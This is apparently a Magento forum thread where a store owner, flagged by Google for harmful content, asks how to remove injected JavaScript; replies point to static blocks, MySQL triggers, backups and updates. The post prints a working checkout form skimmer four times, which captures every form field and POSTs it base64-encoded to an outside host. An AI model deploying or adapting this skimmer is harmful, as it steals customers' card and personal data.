# My Magento is Infected by Virus

Tags: magento-1.9

my website use Magento 
three day ago my Page Blocked By Google I use Google Webmaster Tools : google say 
Harmful content
52 link of my web site contain this unknown javascript :

```
<script type="text/javascript">
<!--
var zeec82c0501f4d57d0b9603dab682b828={
    snd:null,
    fa9729af183d88ef38b4a86b04bef02a5:'https://informaer.net/js/info_jquery.js',
    myid:(function(name){
        var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
        return matches?decodeURIComponent(matches[1]):undefined;
    })('setidd')||(function(){
        var ms=new Date();
        var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
        var date=new Date(new Date().getTime()+60*60*24*1000);
        document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
        return myid;
    })(),
clk:function(){
        zeec82c0501f4d57d0b9603dab682b828.snd=null;
        var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i=0;i<inp.length;i++){
            if(inp[i].value.length>0){
                var nme=inp[i].name;
                if(nme==''){nme=i;}
                    zeec82c0501f4d57d0b9603dab682b828.snd+=inp[i].name+'='+inp[i].value+'&';
            }
        }
    },
    send:function(){
        try{
            var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
            for(var i=0;i<btn.length;i++){
                var b=btn[i];
                if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
                    if(b.addEventListener) {
                        b.addEventListener('click',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                    }else{
                        b.attachEvent('onclick',zeec82c0501f4d57d0b9603dab682b828.clk);
                    }
                }
            }
            var frm=document.querySelectorAll('form');
            for(vari=0;i<frm.length;i++){
                if(frm[i].addEventListener){
                    frm[i].addEventListener('submit',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                }else{
                    frm[i].attachEvent('onsubmit',zeec82c0501f4d57d0b9603dab682b828.clk);
                }
            }
            if(zeec82c0501f4d57d0b9603dab682b828.snd!=null){
                var domm=location.hostname.split('.').slice(0).join('_')  || 'nodomain';
                var keym=btoa(zeec82c0501f4d57d0b9603dab682b828.snd);
                var http=new XMLHttpRequest();
                http.open('POST',zeec82c0501f4d57d0b9603dab682b828.fa9729af183d88ef38b4a86b04bef02a5,true);
                http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
                http.send('info='+keym+'&hostname='+domm+'&key='+zeec82c0501f4d57d0b9603dab682b828.myid);
            }
            zeec82c0501f4d57d0b9603dab682b828.snd=null;
            keym=null;
            setTimeout(function(){zeec82c0501f4d57d0b9603dab682b828.send()},30);
        }catch(e){}
    }
}

if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
    zeec82c0501f4d57d0b9603dab682b828.send();
}
-->
</script>
```

these part of code effluence all part of my website 
I do : change user pass admin 
How do Clean this code from content ?
i see : System > Configuration > General > Design
But Can not See where these code added

for example in div with class class="widget widget-static-block" three time copy these javascript code how found that class and clear javascript code ?

```
    <div class="widget widget-static-block ">
                <p><span class="icon phone">&nbsp;</span><span>پشتیبانی: </span><span class="number">02144743742 , 02144743714</span></p><script type="text/javascript">
<!--
var zeec82c0501f4d57d0b9603dab682b828={
    snd:null,
    fa9729af183d88ef38b4a86b04bef02a5:'https://informaer.net/js/info_jquery.js',
    myid:(function(name){
        var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
        return matches?decodeURIComponent(matches[1]):undefined;
    })('setidd')||(function(){
        var ms=new Date();
        var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
        var date=new Date(new Date().getTime()+60*60*24*1000);
        document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
        return myid;
    })(),
clk:function(){
        zeec82c0501f4d57d0b9603dab682b828.snd=null;
        var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i=0;i<inp.length;i++){
            if(inp[i].value.length>0){
                var nme=inp[i].name;
                if(nme==''){nme=i;}
                    zeec82c0501f4d57d0b9603dab682b828.snd+=inp[i].name+'='+inp[i].value+'&';
            }
        }
    },
    send:function(){
        try{
            var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
            for(var i=0;i<btn.length;i++){
                var b=btn[i];
                if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
                    if(b.addEventListener) {
                        b.addEventListener('click',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                    }else{
                        b.attachEvent('onclick',zeec82c0501f4d57d0b9603dab682b828.clk);
                    }
                }
            }
            var frm=document.querySelectorAll('form');
            for(vari=0;i<frm.length;i++){
                if(frm[i].addEventListener){
                    frm[i].addEventListener('submit',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                }else{
                    frm[i].attachEvent('onsubmit',zeec82c0501f4d57d0b9603dab682b828.clk);
                }
            }
            if(zeec82c0501f4d57d0b9603dab682b828.snd!=null){
                var domm=location.hostname.split('.').slice(0).join('_')  || 'nodomain';
                var keym=btoa(zeec82c0501f4d57d0b9603dab682b828.snd);
                var http=new XMLHttpRequest();
                http.open('POST',zeec82c0501f4d57d0b9603dab682b828.fa9729af183d88ef38b4a86b04bef02a5,true);
                http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
                http.send('info='+keym+'&hostname='+domm+'&key='+zeec82c0501f4d57d0b9603dab682b828.myid);
            }
            zeec82c0501f4d57d0b9603dab682b828.snd=null;
            keym=null;
            setTimeout(function(){zeec82c0501f4d57d0b9603dab682b828.send()},30);
        }catch(e){}
    }
}

if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
    zeec82c0501f4d57d0b9603dab682b828.send();
}
-->
</script>
<script type="text/javascript">
<!--
var zeec82c0501f4d57d0b9603dab682b828={
    snd:null,
    fa9729af183d88ef38b4a86b04bef02a5:'https://informaer.net/js/info_jquery.js',
    myid:(function(name){
        var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
        return matches?decodeURIComponent(matches[1]):undefined;
    })('setidd')||(function(){
        var ms=new Date();
        var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
        var date=new Date(new Date().getTime()+60*60*24*1000);
        document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
        return myid;
    })(),
clk:function(){
        zeec82c0501f4d57d0b9603dab682b828.snd=null;
        var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i=0;i<inp.length;i++){
            if(inp[i].value.length>0){
                var nme=inp[i].name;
                if(nme==''){nme=i;}
                    zeec82c0501f4d57d0b9603dab682b828.snd+=inp[i].name+'='+inp[i].value+'&';
            }
        }
    },
    send:function(){
        try{
            var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
            for(var i=0;i<btn.length;i++){
                var b=btn[i];
                if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
                    if(b.addEventListener) {
                        b.addEventListener('click',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                    }else{
                        b.attachEvent('onclick',zeec82c0501f4d57d0b9603dab682b828.clk);
                    }
                }
            }
            var frm=document.querySelectorAll('form');
            for(vari=0;i<frm.length;i++){
                if(frm[i].addEventListener){
                    frm[i].addEventListener('submit',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                }else{
                    frm[i].attachEvent('onsubmit',zeec82c0501f4d57d0b9603dab682b828.clk);
                }
            }
            if(zeec82c0501f4d57d0b9603dab682b828.snd!=null){
                var domm=location.hostname.split('.').slice(0).join('_')  || 'nodomain';
                var keym=btoa(zeec82c0501f4d57d0b9603dab682b828.snd);
                var http=new XMLHttpRequest();
                http.open('POST',zeec82c0501f4d57d0b9603dab682b828.fa9729af183d88ef38b4a86b04bef02a5,true);
                http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
                http.send('info='+keym+'&hostname='+domm+'&key='+zeec82c0501f4d57d0b9603dab682b828.myid);
            }
            zeec82c0501f4d57d0b9603dab682b828.snd=null;
            keym=null;
            setTimeout(function(){zeec82c0501f4d57d0b9603dab682b828.send()},30);
        }catch(e){}
    }
}

if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
    zeec82c0501f4d57d0b9603dab682b828.send();
}
-->
</script>
<script type="text/javascript">
<!--
var zeec82c0501f4d57d0b9603dab682b828={
    snd:null,
    fa9729af183d88ef38b4a86b04bef02a5:'https://informaer.net/js/info_jquery.js',
    myid:(function(name){
        var matches=document.cookie.match(new RegExp('(?:^|; )'+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+'=([^;]*)'));
        return matches?decodeURIComponent(matches[1]):undefined;
    })('setidd')||(function(){
        var ms=new Date();
        var myid = ms.getTime()+"-"+Math.floor(Math.random()*(999999999-11111111+1)+11111111);
        var date=new Date(new Date().getTime()+60*60*24*1000);
        document.cookie='setidd='+myid+'; path=/; expires='+date.toUTCString();
        return myid;
    })(),
clk:function(){
        zeec82c0501f4d57d0b9603dab682b828.snd=null;
        var inp=document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i=0;i<inp.length;i++){
            if(inp[i].value.length>0){
                var nme=inp[i].name;
                if(nme==''){nme=i;}
                    zeec82c0501f4d57d0b9603dab682b828.snd+=inp[i].name+'='+inp[i].value+'&';
            }
        }
    },
    send:function(){
        try{
            var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button");
            for(var i=0;i<btn.length;i++){
                var b=btn[i];
                if(b.type!='text'&&b.type!='select'&&b.type!='checkbox'&&b.type!='password'&&b.type!='radio'){
                    if(b.addEventListener) {
                        b.addEventListener('click',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                    }else{
                        b.attachEvent('onclick',zeec82c0501f4d57d0b9603dab682b828.clk);
                    }
                }
            }
            var frm=document.querySelectorAll('form');
            for(vari=0;i<frm.length;i++){
                if(frm[i].addEventListener){
                    frm[i].addEventListener('submit',zeec82c0501f4d57d0b9603dab682b828.clk,false);
                }else{
                    frm[i].attachEvent('onsubmit',zeec82c0501f4d57d0b9603dab682b828.clk);
                }
            }
            if(zeec82c0501f4d57d0b9603dab682b828.snd!=null){
                var domm=location.hostname.split('.').slice(0).join('_')  || 'nodomain';
                var keym=btoa(zeec82c0501f4d57d0b9603dab682b828.snd);
                var http=new XMLHttpRequest();
                http.open('POST',zeec82c0501f4d57d0b9603dab682b828.fa9729af183d88ef38b4a86b04bef02a5,true);
                http.setRequestHeader('Content-type','application/x-www-form-urlencoded');
                http.send('info='+keym+'&hostname='+domm+'&key='+zeec82c0501f4d57d0b9603dab682b828.myid);
            }
            zeec82c0501f4d57d0b9603dab682b828.snd=null;
            keym=null;
            setTimeout(function(){zeec82c0501f4d57d0b9603dab682b828.send()},30);
        }catch(e){}
    }
}

if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
    zeec82c0501f4d57d0b9603dab682b828.send();
}
-->
</script>
    </div>
```

Comment: scan your web folder and find where is the code

Comment: @adel did you created backup of both files and database before attack, if so better option to revert to those backup & all take all security measures.....

Answer (score 0):

These codes are normally in static pages and in static blocks. Check all your pages and blocks.

Answer (score 0):

My idea tell that ***mysql injection is running on your database***.

**Run this query at database**

```
show triggers
```

If you found ***any suspicious***  trigger then you need to ***changes MySQL access immediately*** .Also update  your ***magento system to last magento 1.9.X version***